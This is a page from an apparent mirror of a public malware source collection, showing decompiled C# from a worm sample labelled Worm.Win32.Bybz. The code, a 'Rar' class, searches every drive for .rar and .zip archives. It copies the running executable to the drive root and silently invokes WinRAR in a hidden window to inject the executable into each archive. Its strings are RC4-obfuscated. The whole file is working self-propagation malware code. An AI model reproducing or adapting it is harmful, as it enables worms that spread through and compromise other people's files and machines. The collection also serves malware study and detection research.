mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-26 03:55:06 +00:00
f2ac1ece55
add
98 lines
3.7 KiB
C#
98 lines
3.7 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: ajhfsdlhjasnagfgewfwsg.Rar
|
|
// Assembly: Rokan, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 170F4640-026D-46A0-96EF-63F7CE568476
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db.exe
|
|
|
|
using Microsoft.VisualBasic.CompilerServices;
|
|
using System;
|
|
using System.Diagnostics;
|
|
using System.IO;
|
|
using System.Runtime.InteropServices;
|
|
using System.Text;
|
|
|
|
namespace ajhfsdlhjasnagfgewfwsg
|
|
{
|
|
public class Rar
|
|
{
|
|
private static string _rarPath;
|
|
private static string _copiedExeName;
|
|
|
|
[DebuggerNonUserCode]
|
|
public Rar()
|
|
{
|
|
}
|
|
|
|
[DllImport("kernel32.dll", CharSet = CharSet.Auto)]
|
|
public static extern int GetShortPathName(
|
|
[MarshalAs(UnmanagedType.LPTStr)] string path,
|
|
[MarshalAs(UnmanagedType.LPTStr)] StringBuilder shortPath,
|
|
int shortPathLength);
|
|
|
|
private static void Search(string pathName)
|
|
{
|
|
string[] files = Directory.GetFiles(pathName);
|
|
int index1 = 0;
|
|
while (index1 < files.Length)
|
|
{
|
|
string archiveToInject = files[index1];
|
|
if (archiveToInject.Contains(".rar"))
|
|
Rar.RarStart(archiveToInject);
|
|
if (archiveToInject.Contains(".zip"))
|
|
Rar.RarStart(archiveToInject);
|
|
checked { ++index1; }
|
|
}
|
|
string[] directories = Directory.GetDirectories(pathName);
|
|
int index2 = 0;
|
|
while (index2 < directories.Length)
|
|
{
|
|
Rar.Search(directories[index2]);
|
|
checked { ++index2; }
|
|
}
|
|
}
|
|
|
|
public static void Spread(string myExeName)
|
|
{
|
|
Rar._copiedExeName = myExeName;
|
|
string[] logicalDrives = Environment.GetLogicalDrives();
|
|
int index = 0;
|
|
while (index < logicalDrives.Length)
|
|
{
|
|
Rar.Search(logicalDrives[index]);
|
|
checked { ++index; }
|
|
}
|
|
File.Create(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + RRRRR.RC4("ä}Èr;&ª\u0005¤#\u00B3", "Sikan"));
|
|
}
|
|
|
|
public static void RarStart(string archiveToInject)
|
|
{
|
|
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.System);
|
|
string path1 = folderPath.Replace(folderPath.Substring(folderPath.IndexOf("\\")), string.Empty) + "\\";
|
|
Rar._rarPath = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + RRRRR.RC4("ä^Äq\u0019SÀw‡2©\fùCÔ$Ûp", "Sikan");
|
|
if (!File.Exists(Rar._rarPath))
|
|
return;
|
|
if (!File.Exists(Path.Combine(path1, Rar._copiedExeName)))
|
|
File.Copy(Process.GetCurrentProcess().MainModule.FileName, Path.Combine(path1, Rar._copiedExeName));
|
|
StringBuilder shortPath = new StringBuilder((int) byte.MaxValue);
|
|
Rar.GetShortPathName(Path.Combine(path1, Rar._copiedExeName), shortPath, shortPath.Capacity);
|
|
string Right = shortPath.ToString();
|
|
object obj = (object) new StringBuilder((int) byte.MaxValue);
|
|
Rar.GetShortPathName(archiveToInject, (StringBuilder) obj, Conversions.ToInteger(NewLateBinding.LateGet(obj, (Type) null, "Capacity", new object[0], (string[]) null, (Type[]) null, (bool[]) null)));
|
|
try
|
|
{
|
|
ProcessStartInfo startInfo = new ProcessStartInfo();
|
|
string str = Conversions.ToString(Operators.AddObject(Operators.ConcatenateObject(Operators.ConcatenateObject((object) " a ", obj), (object) " "), (object) Right));
|
|
startInfo.FileName = Rar._rarPath;
|
|
startInfo.Arguments = str;
|
|
startInfo.WindowStyle = ProcessWindowStyle.Hidden;
|
|
Process.Start(startInfo);
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
ProjectData.SetProjectError(ex);
|
|
ProjectData.ClearProjectError();
|
|
}
|
|
}
|
|
}
|
|
}
|